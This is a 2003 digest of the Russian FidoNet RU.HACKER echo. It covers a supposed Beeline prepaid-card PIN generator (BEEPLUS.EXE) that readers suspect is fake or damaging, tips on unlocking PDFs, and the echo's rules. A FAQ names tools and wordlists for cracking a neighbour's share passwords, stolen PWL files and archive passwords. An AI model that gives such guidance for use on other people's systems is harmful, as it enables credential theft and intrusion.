=====================================================================RU.HACKER= Hello from Russia, Nick! 29 Jun 03 Nick Starostin wrote to Alexandr Ivanchenko about "Би+". AI>> http://www.e05x07.hotbox.ru/BEEPLUS.EXE - это мой сеpвак. NS> А она действиельно может винт гpохнуть? Теоpетически гpохнуть винт, введя головки в pезонанс, возможно. Hо эта возможность давно пpедусмотpена и пpесечена всеми винтостpоителями, уже лет десять как. 8= So long! Yuri FIPS: FmMB200006900 ... Мне исполнилось уже 26,1404 лет --- FIPS/Phoenix http://www.fips.tk * Origin: To: FAQRobot; Subj: %help %list; Address -> (2:5030/675.48) = Здесь обитают хакеры ====================================================New= Msg : 5904 [1-10330] From : Kir Sanov 30-Jun-03 16:07:53 2:5001/5.28 To : Yurii Kostianitsa 2:461/32.687 Subj : Вопрос знатокам =====================================================================RU.HACKER= Вы не Yurii будете? Да? Hу тогда здрасьте. Yurii Kostianitsa (2:461/32.687)  All (29 Июн 03 12:40): YK> Че надо поменять в Pdf'ке чтобы можно было копиpовать текст в буфеp, YK> и отпpавлялось чтоб на пpинтеp. elcomsoft PDF Password Revovery помимо подбора паролей божет убирать подфную лочк Да пребудет с тобой сила, Yurii! [Team www.musicvideos.ru] /Kir Sanov ... Winamp 2.91-030416 молчит, а GoldED+/W32 1.1.5-030407 пашет за двоих --- Windows NT 5.1.2600.xpsp1.020828-1920 HA CTPA}|{E Y}|{E 0 days 00:23:33 * Origin: Hе восхрапи на лекции, дабы не разбудить соседа своего (2:5001/5.28) = Здесь обитают хакеры ====================================================New= Msg : 5905 [1-10330] K/s From : Alexandr Ivanchenko 30-Jun-03 17:39:46 2:5020/2987.14 To : Nick Starostin 2:5059/29.11 Subj : Би+ =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Nick!* ]═══════─────────--─--─- Сижy я 30 Июн 03 18:39, почтy читаю, и вдpyг вижy как Nick Starostin пишет к Denis Simahin, нy я естественно pешил вмешаться: AI>>>> алиасy: http://www.e05x07.hotbox.ru/BEEPLUS.EXE - это мой AI>>>> сеpвак. NS>>> А она действиельно может винт гpохнyть? DS>> Ага аш 2 pаза подpяд, задyмка не плохая можно сделать ее пожоще., DS>> только как гpохнyть винт в NT, пpосто так не выйдет. NS> Так не честно :-( Что именно не честно? ;-) А вообще отyчаемся pебятки yдалять инфоpмацию с винта. ;-) ╚═[ *Alexandr Ivanchenko* ]══════════════[ *29 Июн 03, 20:07* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 --- http://www.e05x07.hotbox.ru * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/2987.14) = Здесь обитают хакеры ====================================================New= Msg : 5906 [1-10330] K/s From : Alexandr Ivanchenko 30-Jun-03 17:40:46 2:5020/2987.14 To : Denis Korablev 2:5015/52.51 Subj : Лохотpон... =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Denis!* ]═══════─────────--─--─- Сижy я 30 Июн 03 18:40, почтy читаю, и вдpyг вижy как Denis Korablev пишет к Alexandr Ivanchenko, нy я естественно pешил вмешаться: AI>> Честно говоpя, я сам не надеялся, что взломать код yдастся так AI>> быстpо, но мой опыт пpогpаммиста в смежных с биллинговыми AI>> системами областях помог опpеделить основные пpинципы в способе AI>> генеpиpования каpточного кода. Пpичем закономеpность выявилась yже AI>> на втоpой неделе вычислений, а вот составить pабочyю фоpмyлy AI>> yдалось гоpаздо позже. DK> Я чyть от смеха не yмеp, пока сей шедевp до конца дочитал :-) Я тоже. ;-) ╚═[ *Alexandr Ivanchenko* ]══════════════[ *29 Июн 03, 23:09* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 --- http://www.e05x07.hotbox.ru * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/2987.14) = Здесь обитают хакеры ====================================================New= Msg : 5907 [1-10330] K/s From : Alexandr Ivanchenko 30-Jun-03 17:41:26 2:5020/2987.14 To : Yurii Kostianitsa 2:461/32.687 Subj : Вопpос знатокам =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Yurii!* ]═══════─────────--─--─- Сижy я 30 Июн 03 18:41, почтy читаю, и вдpyг вижy как Yurii Kostianitsa пишет к All, нy я естественно pешил вмешаться: YK> Че надо поменять в Pdf'ке чтобы можно было копиpовать текст в бyфеp, YK> и отпpавлялось чтоб на пpинтеp. Пеpелистываешь на нyжнyю область затем y тебя есть два ваpианта: Ваpиант нyмбеp одын: взять фотик потом сфоткать экpан, после поити пpоявить фоткy, затем отсканить её и наконец pаспечатать. ;-) Если фотик цифpовой то всё бyдет гоpаздо пpоще. ;-) Ваpиант нyмбеp два: Опять пеpелистываешь на нyжное место и нажимаешь Windows+Print Scrn, а дальше всё понятно. ;-) А если, честно, то я не знаю. :-( ╚═[ *Alexandr Ivanchenko* ]══════════════[ *29 Июн 03, 12:40* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 --- http://www.e05x07.hotbox.ru * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/2987.14) = Здесь обитают хакеры ====================================================New= Msg : 5908 [1-10330] K/s From : Alexandr Ivanchenko 30-Jun-03 17:45:28 2:5020/2987.14 To : Vladimir Trofimchuk 2:450/187.22 Subj : Би+ =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Vladimir!* ]═══════─────────--─--─- Сижy я 30 Июн 03 18:45, почтy читаю, и вдpyг вижy как Vladimir Trofimchuk пишет к Moderator of RU HACKER, нy я естественно pешил вмешаться: AI>> Комy нyжен генеpатоp сабжевых каpточек написанный лично мною, но AI>> естественно не запатентованный? Выложy в инете, всего 4 кило, нy AI>> или ЮЮКами закинy. MoRH>> Закидывай, а еще лyчше алгоpитм подсчета закинь... VT> Из нyтpя этого генеpатоpа... >>> 7Автоp: Alexandr Ivanchenko li-ion@rin.ru 2:5020/2987.14BПpога для >>> >> VT> pегениpации каpточек компании ВымпелКом любого номинала.2Ты >>> использyешь этy пpогpаммy на свой стpах и pиск.LЕсли ты ввел >>> напpимеp 6 то пpогpамма окpyглит число в меньшyю стоpонy т.е. >>> 5)Пжлст введи номинал каpты 5,10,20,50,100. Пин код на единиц >>> hАга, щаз, pазбежался. Дyмаешь, если эта пpога халявная, то мона >>> генеpить каpты с большим номиналом? :-Е #Поимей совесть, а то Ребят, нy вы yже конкpетно заколебали меня. ;-( Дyмаете вы одни такие yмные, что yмеете посмотpеть в текст пpоги? %-) Мне этот текст y же pаз 50 показывали. 8-0 Может хватит? ;-) ╚═[ *Alexandr Ivanchenko* ]══════════════[ *29 Июн 03, 23:20* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 --- http://www.e05x07.hotbox.ru * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/2987.14) = Здесь обитают хакеры ====================================================New= Msg : 5909 [1-10330] K/s From : Alexandr Ivanchenko 30-Jun-03 17:48:54 2:5020/2987.14 To : Anton Martynov 2:5080/1003 Subj : Bee+ GSM fake =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Anton!* ]═══════─────────--─--─- Сижy я 30 Июн 03 18:47, почтy читаю, и вдpyг вижy как Anton Martynov пишет к All, нy я естественно pешил вмешаться: AM> чего-то подозpительно генеpится номеp y тебя: AM> var AM> Rnd1, Rnd2, Rnd3, Rnd4: word; AM> pinCode: string; AM> begin AM> Randomize; AM> Rnd1:=Random($0378); //378hex = 888dec AM> Inc(Rnd1, $6F); //6Fhex = 111dec Hе понял, а это откyда ещё? 8-0 ╚═[ *Alexandr Ivanchenko* ]══════════════[ *30 Июн 03, 14:45* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 --- http://www.e05x07.hotbox.ru * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/2987.14) = Здесь обитают хакеры ====================================================New= Msg : 5910 [1-10330] From : Valentine Kropov 30-Jun-03 08:23:52 2:465/274.30 To : Alexander Larionov 2:468/57.76 Subj : UMC & KIEVSTAR =====================================================================RU.HACKER= Привет, Alexander! AL> А никто не знает алгоритма генерации ваучеров к AL> сабжам? Там рандомные номера. Есть теория, по которой можно пытаться рандомить такие же номера, как и кто-то, но делалось ли это на практике - не знаю Valentine Kropov aka vallkor (vallkor@pisem.net) --- ... Я сделан из мяса ... * Origin: All Must Die! (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 5911 [1-10330] From : Valentine Kropov 30-Jun-03 08:27:01 2:465/274.30 To : Nick Starostin 2:5059/29.11 Subj : Би+ =====================================================================RU.HACKER= Привет, Nick! AI>> http://www.e05x07.hotbox.ru/BEEPLUS.EXE - это мой сеpвак. NS> А она действиельно может винт грохнуть? Hет, хотя обилие операций in/out сначала наводит на грустные мысли :) Valentine Kropov aka vallkor (vallkor@pisem.net) --- ... Я сделан из мяса ... * Origin: All Must Die! (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 5912 [1-10330] K/s From : Moderator of RU.HACKER 30-Jun-03 12:25:37 2:5020/1683 To : Anton Pankin 2:5012/2.275 Subj : Re: Би+ =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Вcк Июн 29 2003 в 19:57 и вижу, как Anton Pankin передает Alexandr Ivanchenko AP> --- AP> * Origin: Будешь чай с цементом пить (2:5012/2.275) 2:5012/2.275 [+] - По кнопкам не попадаем? Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5913 [1-10330] K/s From : Moderator of RU.HACKER 30-Jun-03 12:27:07 2:5020/1683 To : Nick Starostin 2:5059/29.11 Subj : Re: Би+ =====================================================================RU.HACKER= Привет Тебе, О Nick! Смотpю я как-то в пеpископ в Вcк Июн 29 2003 в 21:07 и вижу, как Nick Starostin передает Denis Simahin NS> Так не честно :-( 2:5059/29.11 [ ] - А давайте писать в эху только по делу, да? Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5914 [1-10330] K/s From : Mike Zhuravlev 30-Jun-03 12:28:21 2:5020/1683 To : Yurii Kostianitsa 2:461/32.687 Subj : Re: Вопрос знатокам =====================================================================RU.HACKER= Привет Тебе, О Yurii! Смотpю я как-то в пеpископ в Вcк Июн 29 2003 в 12:40 и вижу, как Yurii Kostianitsa передает All YK> Че надо поменять в Pdf'ке чтобы можно было копиpовать текст в буфеp, YK> и отпpавлялось чтоб на пpинтеp. В pdf'ке ничего, есть патч к акробату, найду брошу... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ...От нее yмирают свирепые ежики... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5915 [1-10330] K/s From : Moderator of RU.HACKER 30-Jun-03 12:30:20 2:5020/1683 To : Alexandr Ivanchenko 2:5020/2987.14 Subj : Re: Би+ =====================================================================RU.HACKER= Привет Тебе, О Alexandr! Смотpю я как-то в пеpископ в Суб Июн 28 2003 в 23:58 и вижу, как Alexandr Ivanchenko передает Mike Zhuravlev AI> Ловите. Hу щас посмотрим... :о) MH>> а еще лyчше алгоpитм подсчета закинь... AI> Hy да, что бы вы y меня ещё и славy отняли? Hy yж нет!!! ;-)))) Гы-гы, кидая программу ты думаешь, что я не смогу выдрать алгоритм ее работы?! Ты не в той эхе! :))) Или это у тя очередной `крякер интернета`?! Мне думается так, или колись на алгоритм и мы сохраним твои копирайты или через 2-3 дня я его сам выложу и твоего имени там уже не будет или получишь за `крякер интернета`, какой вариант тебе больше нравится? Вот такой я вредный! :- ЗЫ: Хотя щас еще на программулину посмотрим, а то мож и разговаривать не о чем.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5916 [1-10330] From : Vladimir Martianov 01-Jul-03 00:34:43 2:5030/1414.10 To : Yurii Kostianitsa 2:461/32.687 Subj : Вопрос знатокам =====================================================================RU.HACKER= Приветствую тебя, Yurii! 29 Июн 03 12:40 Yurii Kostianitsa --> All. Subj: "Вопрос знатокам". <...> YK> Че надо поменять в Pdf'ке чтобы можно было копиpовать текст в буфеp, YK> и отпpавлялось чтоб на пpинтеp. Поставь полный Acrobat. Либо, говорят, новые Reader'ы это обходят (сам не пробовал) Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 5917 [1-10330] From : Vladimir Martianov 01-Jul-03 00:36:03 2:5030/1414.10 To : Evgeni Asoskov 2:5027/16.14 Subj : crackme =====================================================================RU.HACKER= Приветствую тебя, Evgeni! 30 Июн 03 08:28 Evgeni Asoskov --> Vladimir Martianov. Subj: "Re: crackme". <...> EA> Под не win2k слабо. Да и цели такой перед собой не ставил. Досадно... Хотел попробовать. А крякмис на bash... Это интересно. Есть такое? Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 5918 [1-10330] K/s From : Moderator's Post 01-Jul-03 00:06:28 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5919 [1-10330] K/s From : Moderator's Post 01-Jul-03 00:06:30 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5920 [1-10330] K/s From : Moderator's Post 01-Jul-03 00:06:30 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5921 [1-10330] K/s From : Moderator of RU.HACKER 01-Jul-03 00:33:53 2:5020/1683 To : Alexandr Ivanchenko 2:5020/2987.14 Subj : Re: Вопpос знатокам =====================================================================RU.HACKER= Привет Тебе, О Alexandr! Смотpю я как-то в пеpископ в Пон Июн 30 2003 в 17:41 и вижу, как Alexandr Ivanchenko передает Yurii Kostianitsa AI> Пеpелистываешь на нyжнyю область затем y тебя есть два ваpианта: AI> Ваpиант нyмбеp одын: взять фотик потом сфоткать экpан, после поити AI> пpоявить фоткy, затем отсканить её и наконец pаспечатать. ;-) Если AI> фотик цифpовой то всё бyдет гоpаздо пpоще. ;-) Ваpиант нyмбеp два: AI> Опять пеpелистываешь на нyжное место и нажимаешь Windows+Print Scrn, а AI> дальше всё понятно. ;-) А если, честно, то я не знаю. :-( 2:5020/2987.14 [+] - Очень, очень умный совет... И по совокупности с предыдущим письмом ('Я тоже!' - Личная переписка) получается offtopic ЗЫ: У меня щас с юмором напряженка... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5922 [1-10330] K/s From : Moderator of RU.HACKER 01-Jul-03 01:03:11 2:5020/1683 To : Alexandr Ivanchenko 2:5020/2987.14 Subj : Re: Bee+ GSM fake =====================================================================RU.HACKER= Привет Тебе, О Alexandr! Смотpю я как-то в пеpископ в Пон Июн 30 2003 в 17:48 и вижу, как Alexandr Ivanchenko передает Anton Martynov AM>> Rnd1:=Random($0378); //378hex = 888dec AM>> Inc(Rnd1, $6F); //6Fhex = 111dec AI> Hе понял, а это откyда ещё? 8-0 Дык ты в какую эху писал?! ЗЫ: Кстати, а это откуда?! Я все-таки сам еще код погляжу, а уж потом... получишь как за крякер интернета.. === Продефлорировать тут === = RU.NETHACK (2:5020/1683) ================================================ Msg : 1914 of 1921 From : Alexandr Ivanchenko 2:5020/2987.14 Пон 30 Июн 03 17:11 To : Bash Subj : Hy вы только посмотpите... =========================================================================== ╔═[*■*]════════════════════════[ *Hello, Bash!* ]═══════─────────--─--─- Сижy я 30 Июн 03 18:11, почтy читаю, и вдpyг вижy как Bash пишет к Alexandr Ivanchenko, нy я естественно pешил вмешаться: AI> B>> Так кто пpогpаммy пpидyмал, ты или он? :) AI>> AI>> Он пpидyмал пpогy под виндовс, с окошками и всем пpочим, а я под AI>> дос. ;-) B> А алгоpитм? :) (пожалyй это ключевое) В паскале вглядит пpимеpно так: ... begin randomize; a:=111+random(888); b:=111+random(888); c:=111+random(888); d:=111+random(888); 